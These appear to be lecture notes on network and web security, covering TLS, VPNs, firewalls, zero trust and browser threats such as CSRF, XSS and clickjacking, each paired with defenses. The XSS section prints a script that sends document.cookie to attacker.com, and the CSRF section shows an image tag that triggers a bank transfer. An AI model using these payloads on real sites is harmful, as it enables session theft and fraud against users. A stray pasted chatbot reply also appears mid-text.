The protocol evolved from SSL, with SSL 3.0 being the final version of that series. TLS 1.0 and 1.1 have since been deprecated, and TLS 1.2—while still widely used—is being phased out in favor of TLS 1.3. The newest version eliminates outdated algorithms, simplifies the handshake, and provides improved security guarantees.

Protocol Structure

TLS operates through two sub-protocols: the handshake protocol and the record protocol.

1. The handshake protocol establishes trust and session keys. It uses X.509 certificates and ephemeral Diffie-Hellman key exchange to ensure perfect forward secrecy.

2. The record protocol securely transmits application data. It protects the confidentiality and integrity of application data. It uses symmetric ciphers such as AES-GCM or ChaCha20-Poly1305. Integrity is ensured using AEAD (Authenticated Encryption with Associated Data), a construction that integrates encryption and authentication into a single process, reducing overhead and avoiding the need for separate MACs.

Key Derivation and Session Resumption

After completing the handshake, both client and server use HKDF (HMAC-based Extract-and-Expand Key Derivation Function) to derive multiple cryptographic keys from the shared secret. This function ensures that all derived keys are cryptographically independent and unpredictable.

TLS 1.3 supports rapid session resumption using 0-RTT (zero round-trip time), which allows a client to resume a previous session without a full handshake. While this feature improves performance, it introduces replay risks and is used with care.

Security and Limitations

TLS verifies the identity of the server using a certificate issued by a trusted certificate authority (CA). However, trust in the remote server still depends on the server’s certificate being valid and the server itself being uncompromised.

While TLS supports mutual authentication, client authentication using certificates is rarely deployed due to complexity and usability concerns. Instead, clients are typically authenticated after the secure channel is established, using usernames, passwords, and optionally multi-factor authentication.

Although TLS offers strong security, previous versions were susceptible to downgrade and renegotiation attacks. TLS 1.3 mitigates these risks by removing legacy features and enforcing secure defaults. The protocol is robust but not foolproof—trust still depends on proper certificate validation and endpoint security.

Virtual Private Networks (VPNs)

Virtual Private Networks (VPNs) provide encrypted communication between remote systems at the network layer. While TLS secures individual application sessions, VPNs secure all traffic between hosts or networks, making them transparent to applications and users.

VPNs are commonly used to connect remote offices, support telecommuting, and access internal systems over untrusted networks. They work by encapsulating packets from one network and securely transmitting them over another.

Tunneling and Encapsulation

The foundation of VPN technology is tunneling, which involves wrapping private IP packets within another packet that can be routed over the public internet. This allows private networks to communicate as if they were directly connected.

To secure the encapsulated packets, VPNs use encryption and message authentication. Encryption ensures the confidentiality of data, while authentication prevents tampering and verifies packet origin. These protections help prevent eavesdropping, packet injection, and man-in-the-middle attacks.

VPN Implementations

Several protocols implement VPN functionality, with OpenVPN, IPsec, and WireGuard being among the most widely used.

OpenVPN

OpenVPN is a flexible, user-space VPN protocol that uses TLS for session management. It sets up a virtual network interface in the operating system (using TUN or TAP interfaces) to route traffic into the user-level application that sets up an encrypted tunnel. OpenVPN can operate over TCP or UDP and is compatible with most operating systems.

TLS is used in the control channel for authentication and key exchange, typically with X.509 certificates or pre-shared keys. The data channel encrypts packets using symmetric algorithms like AES or ChaCha20 and ensures integrity with HMAC. Forward secrecy is supported when ephemeral keys are used. OpenVPN is popular for its portability and ease of deployment, though it may have higher overhead than kernel-space solutions.

IPsec

IPsec operates at the IP layer and secures communication between hosts or networks independently of the transport protocol. It supports two modes: tunnel mode, used for site-to-site communication where the entire IP datagram is encapsulated, and transport mode, used for host-to-host communication, where only the payload is encrypted.

IPsec includes two main protocols. The VPN administrator will choose one of these. The Authentication Header (AH) ensures integrity and authenticity of the IP packet, while the Encapsulating Security Payload (ESP) provides encryption in addition to AH’s features. In tunnel mode, ESP encrypts and authenticates the entire original packet but does not protect the new outer IP header.

Authentication is performed via certificates or pre-shared keys, and keys are exchanged using Diffie-Hellman. Supported encryption algorithms include AES-CBC and AES-CTR, with integrity provided by HMAC-SHA1 or SHA2. IPsec is widely deployed but can be complex to configure and debug.

WireGuard

WireGuard is a modern VPN protocol designed for simplicity, high performance, and strong cryptographic security. It stands out from traditional protocols like OpenVPN and IPsec due to its compact codebase, fixed cryptographic suite, and formal verification efforts.

WireGuard is implemented in kernel space, allowing it to achieve lower latency and higher throughput than user-space VPNs.

While WireGuard operates within the operating system kernel, it transmits tunneled packets over UDP, placing it at the transport layer in terms of packet transmission. The encapsulated IP packets are treated as payload, wrapped inside UDP datagrams, and then sent to the remote endpoint.

Instead of using X.509 certificates for authentication, like OpenVPN or IPsec, WireGuard authenticates peers using public keys directly configured on each endpoint. Each peer is identified by a static public key, which is explicitly associated with allowed IP addresses. This eliminates the need for a certificate authority or certificate management infrastructure, simplifying configuration and reducing potential attack surfaces.

Communication begins with a lightweight handshake based on elliptic curve Diffie-Hellman, establishing shared session keys. These keys are periodically re-established – by default, every 2 minutes of activity – to ensure forward secrecy. All data is encrypted using the ChaCha20 stream cipher and authenticated with Poly1305.

WireGuard’s minimalism, cryptographic rigor, and performance characteristics make it especially attractive for modern deployments, including mobile devices and high-speed infrastructure.

Firewalls

Firewalls are a critical component of network security architecture. Their primary role is to protect the boundary between a trusted internal network and an untrusted external one, such as the Internet. A firewall enforces access control policies by inspecting and filtering traffic that flows between these two environments.

Firewalls operate at different layers of the network stack and have evolved over time: from basic packet filtering to sophisticated systems capable of application-aware inspection and behavioral analysis.

Network Address Translation (NAT)

One early innovation associated with firewall deployment is Network Address Translation (NAT). NAT enables multiple devices within a private network to share a single public IP address. It maps internal source addresses and ports to external ones, modifying both IP and transport-layer headers.

This technique was driven by the limited supply of IPv4 addresses. Private IP ranges defined in RFC 1918 (e.g., 192.168.0.0/16, 10.0.0.0/8) are non-routable on the public Internet and require NAT to communicate externally.

NAT inherently provides a security benefit: unsolicited inbound traffic from external hosts cannot reach internal systems unless a session has already been initiated from inside.

Packet Filtering Firewalls

First-generation firewalls, also known as packet filters or screening routers, inspect network packets independently. These filters operate by matching packet header fields against a set of rules, known as an access control list (ACL), and taking an action—typically to accept, drop, or reject the packet.

This set of rules is often referred to as a chain because the firewall processes the rules sequentially, like links in a chain:

• Each incoming or outgoing packet is matched against the rules in order.
• Once a rule matches, its corresponding action is applied and no further rules are evaluated.
• If no rule matches, a default policy—typically “deny all”—is applied.

The term “chain” is commonly used in firewall implementations like Linux’s iptables and nftables, where different chains can be defined for handling various traffic flows (e.g., input, output, forwarding), and rules can jump to other chains for more modular control.

Rules in a packet filter typically examine:

• Source and destination IP addresses
• Source and destination ports
• Protocol (e.g., TCP, UDP, ICMP)
• Interface on which the packet was received

The security model often follows “default deny,” meaning only explicitly allowed traffic is permitted. These filters do not maintain any context between packets, making them stateless but efficient.

Stateful Packet Inspection(SPI)

Second-generation firewalls introduced Stateful Packet Inspection (SPI). These firewalls maintain state tables to track the status of network connections, especially useful for TCP, which involves distinct setup and teardown phases.

Stateful firewalls can:

• Allow return traffic only after a valid connection is initiated
• Block unsolicited packets that appear malicious (e.g., spoofed TCP packets)
• Track stateless protocols like UDP and ICMP by observing request-reply relationships

This state tracking makes SPI firewalls more secure and functional than stateless filters.

Deep Packet and Content Inspection

Third-generation firewalls implement Deep Packet Inspection (DPI). Unlike earlier models that focus only on IP and transport headers, DPI firewalls examine application-layer content.

This allows:

• Detection of protocol misuse (e.g., malformed HTTP headers)
• Filtering based on URLs, file types, or keywords
• Blocking of risky elements like ActiveX or Java applets

Deep Content Inspection (DCI) extends DPI by reconstructing entire content streams, decoding them (e.g., base64 in email), and scanning for malware signatures or sensitive data leaks.

Deep Packet Inspection (DPI) and Deep Content Inspection (DCI) face challenges when dealing with encrypted traffic, such as HTTPS, SSH, or TLS-protected protocols. There are a few approaches to dealing with this, none of them great:

• Examine only headers and protocols: Even when data is encrypted, certain metadata like source/destination IP addresses, ports, and TLS handshake parameters remain visible. DPI can still infer the protocol in use and possibly the domain name (via Server Name Indication in TLS), but not the actual content.
• Man-in-the-Middle (MitM) Interception: The DPI device to present its own TLS certificate to the client. The DPI system acts as an intermediary, terminating the secure connection from the client and creating a new encrypted session to the server. This breaks end-to-end encryption but is often used by next-generation firewalls.
• Host-based firewalls: Instead of decrypting in the network (at the firewall), the inspection may happen at the endpoint before encryption (for outgoing traffic) or after decryption (for incoming traffic) using host-based firewalls or other security agents.

Application Proxies

Application-layer proxies mediate communication for specific protocols (e.g., HTTP, FTP). They terminate connections from clients, inspect requests, and then relay traffic to the target server if the request passes policy checks.

These proxies can:

• Enforce strict protocol compliance
• Prevent direct connections between networks
• Operate on dual-homed hosts for added segmentation

Security Zones and DMZs

Modern networks are divided into security zones to manage risk and enforce access control policies. Each zone represents a grouping of systems with similar trust levels and security requirements. By segmenting networks into zones and controlling traffic between them using firewalls, organizations can limit the potential damage of security breaches and prevent lateral movement by attackers.

One key architectural concept is the Demilitarized Zone (DMZ). The DMZ is a semi-trusted zone that sits between the external Internet and the internal network. It hosts public-facing services, such as web servers, DNS servers, and mail relays, that need to be accessible to external users but should not have unrestricted access to sensitive internal systems.

A bastion host is a system placed in the DMZ that is hardened and exposed to potential attacks. Because it interfaces with untrusted networks, it is designed to resist compromise:

• It runs only essential services
• It uses minimal software
• It has limited user accounts
• It is regularly audited for vulnerabilities

A DMZ architecture typically involves two firewalls or a multi-interface firewall.Traffic is tightly controlled at each boundary:

• External clients can access only specific services hosted in the DMZ.
• Internal clients can reach both the DMZ and the Internet, subject to policy.
• DMZ systems have limited access to internal systems and the Internet.

This layered defense strategy helps contain compromises and provides a buffer zone between the most vulnerable systems and the organization’s critical assets.

Intrusion Detection and Prevention Systems (IDS/IPS)

Intrusion Detection Systems (IDS) monitor traffic to detect suspicious behavior and alert administrators. Intrusion Prevention Systems (IPS) actively block malicious traffic in real time.

Types of detection include:

• Protocol-based IDS: Enforces protocol correctness (e.g., HTTP header validation)
• Signature-based IDS: Matches known attack patterns (e.g., malware signatures)
• Anomaly-based IDS: Detects deviations from established baseline behavior

While signature-based detection is precise for known threats, anomaly detection can identify novel attacks at the cost of more false positives.

Host-Based Firewalls

Unlike network firewalls, host-based firewalls run on individual systems and monitor traffic per application. They offer fine-grained control and are valuable in a deperimeterized world, where the distinction between internal and external networks has eroded.

One key advantage of host-based firewalls is their ability to associate network activity with specific applications running on the system. Unlike traditional packet filters that make decisions based solely on IP addresses and port numbers, host-based firewalls can identify and control network traffic on a per-application basis.

This enables the firewall to:

• Allow or block traffic based on the identity of the software process, not just network attributes
• Prompt users to approve or deny network access when a new application attempts communication
• Define granular policies, such as permitting only a web browser to access the Internet, while blocking all traffic from unknown or suspicious programs
• Prevent unauthorized or malicious software from exfiltrating data, even if it attempts to use commonly allowed ports like 443 (HTTPS)

This per-application awareness makes host-based firewalls particularly effective at detecting and containing malware. If an unapproved program attempts to send data to the Internet, it can be blocked even if it mimics legitimate traffic.

However, this model is not without its limitations. If malware gains elevated privileges, such as root or administrative access, it may be able to disable the firewall or manipulate its configuration, undermining the protections it provides.

Despite this risk, host-based firewalls are a crucial component of a defense-in-depth strategy. They complement network-level protections by offering localized, context-aware control tailored to the specific behavior of individual systems and applications.

Zero Trust and Deperimeterization

With the rise of mobile devices, cloud computing, and remote work, internal networks can no longer be assumed trustworthy. Deperimeterization describes the collapse of traditional network boundaries.

The Zero Trust Architecture (ZTA) model addresses this by requiring authentication and authorization for every connection, regardless of its source. Key principles include:

• No implicit trust for devices on the internal network
• Least privilege access enforced dynamically
• Continuous validation of users, devices, and policies

ZTA may require micro-segmentation, strong identity verification, and support from both network infrastructure and applications.

Summary

Web Security

Web applications have grown from static pages into highly interactive platforms. This transformation has introduced a wide attack surface, shifting attention from server vulnerabilities to complex browser and client-side threats. Today, web security must address how scripts, data, and user state interact across trust boundaries in the browser.

Same-Origin Policy

The same-origin policy (SOP) is the foundation of browser security. It restricts how documents or scripts loaded from one origin can interact with resources from another.

An origin is defined by:

• Scheme (e.g., http or https)
• Hostname
• Port

Resources sharing all three attributes are of the same origin. The same-origin policy prevents a script on one site from reading data (like cookies or DOM) from another origin. While content like images and stylesheets can be embedded from other origins, they cannot be programmatically accessed or modified.

Cross-Origin Resource Sharing (CORS)

Modern web applications routinely load content from multiple origins. A single page might include analytics scripts from Google, fonts from a CDN, and interactive elements from a separate application domain. This modularity improves performance, reduces redundancy, and allows the integration of specialized services. However, it also introduces potential security risks since the same-origin policy would ordinarily block interaction between different origins.

Cross-Origin Resource Sharing (CORS) is a standardized mechanism that enables secure cross-origin requests. It allows servers to specify which external origins are permitted to access their resources via HTTP headers.

For example:

Access-Control-Allow-Origin: https://trusted-site.com

This tells the browser that scripts from https://trusted-site.com can access resources from the server as if they were of the same origin. CORS is essential for enabling the safe, flexible, and secure integration of third-party services in web applications.

Absolutely — here is the refined Cookies and Web State section with a clearer structure. It now separates duration-based types (session vs. persistent) from origin-based types (first-party vs. third-party), and each category includes brief explanations:

Cookies and Web State

Cookies store small name-value pieces of data in the browser and are sent with each HTTP request to the matching domain and path. They allow websites to maintain state across page loads and sessions.

Cookies are used for three main purposes:

• Session management: Identify logged-in users, maintain session state, and manage items like shopping carts or form progress.
• Personalization: Store user preferences such as language, layout, or theme for a customized experience.
• Tracking: Monitor user behavior across visits or across sites (via third-party cookies), enabling analytics and targeted advertising.

Cookie Types by Duration

• Session cookies: Temporary; stored in memory and deleted when the browser closes. Commonly used for login sessions or temporary interactions. Persistent cookies: These are stored on disk with an expiration date and are used to remember user preferences or identifiers across browser restarts.

Cookie Types by Origin

First-party cookies: These are set by the domain in the browser’s address bar and are used to maintain sessions, settings, and internal functionality.

• Third-party cookies: Set by embedded content from external domains (e.g., ads or trackers). Primarily used for tracking users across different websites.

Cookie Flags

• HttpOnly: Blocks access from JavaScript, helping protect session cookies from XSS attacks.
• Secure: Restricts the cookie to HTTPS connections, protecting it from being sent over insecure channels.
• SameSite: Controls whether cookies are sent on cross-site requests. Helps mitigate CSRF attacks.

Cookies are further scoped by domain and path, limiting when they are included in requests. Due to privacy concerns, modern browsers are moving toward restricting or phasing out third-party cookies.

Cross-Site Request Forgery (CSRF)

CSRF exploits browser behavior by inducing users to send authenticated requests to a site without their knowledge.

Example:

If a user is logged into their bank, an attacker can embed a request to transfer money in an image tag:

<img src="https://bank.com/transfer?amount=1000&to=attacker" />

Defenses:

• CSRF tokens: Embed a unique token in each form; the server verifies it on submission to ensure the request came from the correct user.
• SameSite cookies: Prevent cookies from being sent in cross-site requests unless explicitly allowed.
• Referer or Origin header validation: Ensure the request came from the expected domain.
• Log out users after inactivity: Reduces the time window for a successful CSRF attempt.

Cross-Site Scripting (XSS)

Cross-Site Scripting (XSS) attacks inject malicious scripts into web pages that are then executed in the browser of users who visit the affected pages. These scripts run with the same privileges as trusted content, allowing attackers to hijack sessions, steal cookies, manipulate the DOM, or redirect users to malicious sites.

Stored (Persistent) XSS

In a stored XSS attack, the malicious script is permanently stored on the server—typically in a database, forum post, user profile, comment, or message. Every time a victim loads the affected page, the script is delivered as part of the content and runs in their browser.

Example:

• An attacker posts a comment like:

  <script>fetch('https://attacker.com/steal?cookie=' + document.cookie)</script>

• Any user viewing the comment will execute the script, unknowingly leaking their session data to the attacker.

Stored XSS is especially dangerous because:

• It does not require social engineering after the script is planted.
• It can affect many users who simply view the page.
• It persists until removed from the server or sanitized.

Reflected XSS

In reflected XSS, the malicious input is not stored but instead immediately returned in a server response. The attack usually involves a crafted URL containing a payload in a query parameter or fragment that the server echoes into the HTML page without proper sanitization.

Example:

• A victim clicks a malicious link such as:

  https://example.com/search?q=<script>steal()</script>

• The server embeds the q parameter directly into the response page:

  Search results for: <script>steal()</script>

• The script runs as soon as the page loads, allowing the attacker to perform actions on the victim’s behalf or exfiltrate data.

Reflected XSS:

• Typically requires the attacker to trick the victim into clicking a malicious link.
• Is often delivered through phishing emails, social media messages, or malicious advertisements.
• Affects only the users who interact with the crafted URL.

Defenses

• Input validation and output encoding: Reject or sanitize dangerous characters before inserting input into the page. Always encode untrusted output into HTML, JavaScript, or attributes.
• Secure templating engines: Use libraries that automatically escape output (e.g., Django, Handlebars, React JSX).
• Content Security Policy (CSP): Restrict the sources from which scripts can be loaded, and disallow inline JavaScript.
• HttpOnly cookies: Prevent JavaScript from accessing cookies, reducing the impact of successful attacks.

Clickjacking

Clickjacking is a deceptive technique where an attacker tricks a user into clicking on something different from what the user perceives, typically by layering transparent or disguised elements over visible content.

For example, an attacker might embed a legitimate site (like a social media or banking page) inside a transparent <iframe> that is positioned over a fake button. When the user thinks they’re clicking the fake button (e.g., “Claim Prize”), they’re actually clicking a hidden button on the legitimate site, such as “Like,” “Confirm,” or “Transfer.”

Potential consequences of clickjacking include:

• Submitting forms or triggering actions without the user’s knowledge.
• Changing security settings or authorizing transactions.
• Unintended interaction with social media (e.g., liking a post, following an account).
• Installing malware or enabling browser/device features (e.g., webcam).

Defenses against clickjacking include:

• X-Frame-Options header: Tells the browser whether the page can be embedded in an <iframe>. Set to DENY or SAMEORIGIN to prevent third-party framing. Content Security Policy (CSP)**: The frame-ancestors directive restricts which origins can embed the page.
• JavaScript frame-busting: Pages can include scripts that check if the current window is the top-level window:

  if (window.top !== window.self) {
    window.top.location = window.location;
  }

However, client-side checks are not foolproof and should be combined with server-side headers.

WebAssembly and Browser Extensions

WebAssembly (Wasm) allows compiled binary code to run in browsers, increasing performance—but also making malicious code harder to inspect.

Browser extensions, especially those with wide permissions, can exfiltrate data or modify content. They pose a significant risk if poorly vetted.

DNS Rebinding

An attacker can exploit DNS to change a domain’s IP address after the browser has cached it, tricking it into treating a new server as the same origin.

Defenses:

• Prevent DNS resolution to private IPs
• Enforce long DNS TTLs

Homograph and Typosquatting Attacks

Homograph attacks use visually similar Unicode characters to deceive users:

• paypaI.com (with a capital ‘I’) vs. paypal.com

Typosquatting registers domain names that are slight misspellings of legitimate ones, hoping users will make typographical errors. Examples: gooogle.com, amaz0n.com.

Combosquatting is a related tactic where attackers register plausible-looking domain variants by appending or inserting words to mimic a real brand. Examples: chase-bank-login.com, paypal-support.site.

Both techniques are used in phishing, ad fraud, and malware distribution campaigns.

Package Repository Attacks

Attackers upload malicious libraries to public repositories using:

• Typosquatting: e.g., requet instead of request
• Dependency confusion: Exploiting mismatches between internal and public package namespaces

These attacks have successfully targeted major companies like Apple, Shopify, and Tesla.

Tracking via Images

Image tags (<img>) are treated as passive content, but they can be used to track users when embedded with unique URLs or placed invisibly in pages or emails.

A tracking pixel is a 1×1 image whose URL includes identifiers or page-specific data. When loaded:

• The browser sends a request to the image’s server.
• All cookies associated with that domain are included.
• The URL may carry parameters identifying the user or page.
• The server logs this along with IP, user agent, and referer data.

This allows the server to track views of a message or web page and correlate user activity across multiple sites or visits—even without JavaScript.

Tracking pixels are common in advertising, email marketing, and third-party analytics.

Deception and Spoofing

Social engineering attacks exploit:

• Status bar spoofing via JavaScript
• Misleading display vs. landing URLs
• Fake site layouts using cloned CSS and images

Users may be tricked into disclosing credentials or installing malware, believing the site is legitimate.

Conclusion

Modern web security must address a massive attack surface introduced by scripts, dynamic content, and third-party services. Developers must validate all inputs, isolate content using SOP and CORS, and secure user state with proper cookie attributes and CSP. Browser vendors, site administrators, and developers all play roles in reducing risk in this adversarial ecosystem.